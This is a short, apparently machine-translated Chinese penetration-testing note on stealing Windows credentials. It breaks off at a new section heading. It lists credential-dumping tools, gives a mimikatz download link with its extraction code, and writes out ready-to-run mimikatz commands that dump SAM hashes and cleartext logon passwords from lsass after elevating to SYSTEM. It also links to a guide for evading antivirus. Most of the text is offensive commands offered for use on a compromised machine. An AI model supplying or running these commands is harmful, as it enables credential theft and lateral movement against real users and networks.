Voucher information collection

01 Voucher acquisition tool

Often used to get windows Password tools

1. mimikatz
2. wce
3. pwddump7
4. ophcrack
5. procdump+mimikatz
6. lazagne

02 password hash

LM Hash &NTLM Type hash

winodws hash:

windows Local hash：

http://www.secpulse.com/archives/65256.html

windows Under the system hash Password format ：

User name :RID:LM-HASH value :NT-HASH value

03mimikatz

mimikatz download ：

link ：https://pan.baidu.com/s/1ZbQM5YrgNyqmHFWBySSJjg

Extraction code ：jryu

Non local interactive credential acquisition

mimikatz.exe "log res.txt" "privilege::debug" "token::elevate" "lsadump::sam" "exit"

mimikatz.exe "log logon.txt" "privilege::debug" "sekurlsa::logonpasswords" "exit"

Generally, the target plane is landed remotely , Download in the target mimikatz

log result.txt（ Send the results to txt in ）

privilege::debug（ Raise the right ）

token::elevate（ Impersonate token ： Used to promote permissions to SYSTEM ( Default ) Or find the domain administrator token in the box ）

Get system User token

lsadump::sam（ Get user hash ）

sekurlsa::logonpasswords（ Get clear text password ）

mimikatz1.x edition ：

privilege::debug // Increase authority

inject::process lsass.exe sekurlsa.dll // Inject sekurlsa.dll To lsass.exe In progress

@getLogonPasswords // Get password

mimikatz No killing ：

https://www.freebuf.com/articles/system/234365.html

04get-hashs